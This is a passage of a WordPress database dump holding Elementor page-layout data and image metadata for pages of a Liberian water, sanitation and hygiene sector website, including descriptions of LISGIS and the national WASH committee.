More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"lla\\\",\\\"tag_id\\\":\\\"57\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"lla\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eea10f6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"cc28ee8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a346330\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"390048a\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:lla\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(18561,2723,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(18563,2723,'_thumbnail_id','2722'),(18565,2724,'_wp_attached_file','2019/11/featured_wash.jpg'),(18566,2724,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:25:\"2019/11/featured_wash.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"featured_wash-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"featured_wash-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"featured_wash-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1573909008\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(18567,2725,'_elementor_edit_mode','builder'),(18568,2725,'_elementor_template_type','wp-post'),(18569,2725,'_elementor_version','2.7.5'),(18570,2725,'_wp_page_template','default'),(18571,2725,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cc356dd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>LISGIS Serves as the prime, authoritative agency of Government responsible for collecting, managing, coordinating, supervising, evaluating, analyzing, disseminating and setting quality standards for statistical and associated geo-information for overall national socio-economic reconstruction and development; and<\\/p><p>More specifically, LISGIS formulates and implements national strategies, programs and policies for the development and management of a National Statistical and Geo-Information System and an integrated gender and environment sensitive National Statistical and Spatial Database in Liberia.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8ebf546\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"1c7b3ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e89fbef\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b6f5d28\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"lisgis\\\",\\\"tag_id\\\":\\\"56\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"lisgis\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bef4576\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"762ba4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"89dda08\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"867bd0f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:lisgis\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(18572,2725,'_thumbnail_id','2473'),(18573,2725,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(18574,2457,'_thumbnail_id','2724'),(18575,2726,'_elementor_edit_mode','builder'),(18576,2726,'_elementor_template_type','wp-post'),(18577,2726,'_elementor_version','2.7.5'),(18578,2726,'_wp_page_template','default'),(18579,2726,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ef0e5ce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Water, sanitation and hygiene not only improve the quality of life but also bring tangible health, environmental and economic benefits and contribute to poverty reduction. With the current poor access to water, sanitation and good hygiene practices in Liberia, it should be noted that Liberia is losing a notable proportion of its GDP and not financing WASH will contribute to preventing Liberia from reaching its vision of becoming a middle income country by 2030.<\\/p><p>The Government of Liberia (GoL) has taken the initiative to accelerate the delivery of water, sanitation and hygiene (WASH) services in the country. A coordinated, comprehensive, and well-targeted investment programme to increase safe water coverage and reduce diseases is being implemented. This website brings together all information on the Liberia WASH Sector \\u2014 stakeholders, events, project information, water point mapping data, and much more. The site is managed by the National Water Sanitation and Hygiene Promotion Committee (NWSHPC).<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c15c0a\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"67bf510\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f23c00\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"06ca2c7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"wash\\\",\\\"tag_id\\\":\\\"166\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"wash\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"573143f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"455a18c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2875b46\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:wash\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(18580,2726,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(18582,2726,'_thumbnail_id','2724'),(18583,2727,'_wp_attached_file','2019/11/featured_ci.jpg'),(18584,2727,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:23:\"2019/11/featured_ci.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"featured_ci-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"featured_ci-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"featured_ci-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:10:\"Rob McNeil\";s:6:\"camera\";s:10:\"NIKON D300\";s:7:\"caption\";s:47:\"Liberian boy carrying bucket of oil palm fruit.\";s:17:\"created_timestamp\";s:10:\"1273743558\";s:9:\"copyright\";s:49:\"© Conservation International/photo by Rob McNeil\";s:12:\"focal_length\";s:2:\"20\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:6:\"0.0125\";s:5:\"title\";s:47:\"Liberian boy carrying bucket of oil palm fruit.\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:9:{i:0;s:6:\"africa\";i:1;s:3:\"boy\";i:2;s:6:\"bucket\";i:3;s:8:\"carrying\";i:4;s:5:\"child\";i:5;s:7:\"liberia\";i:6;s:14:\"oil palm 